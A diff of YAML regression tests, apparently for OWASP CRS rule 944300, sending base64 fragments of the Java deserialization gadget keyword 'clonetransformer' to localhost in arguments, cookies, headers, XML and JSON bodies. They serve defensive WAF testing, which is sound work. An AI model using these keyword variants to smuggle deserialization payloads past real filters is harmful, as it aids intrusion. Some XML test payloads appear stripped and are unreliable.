User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 95 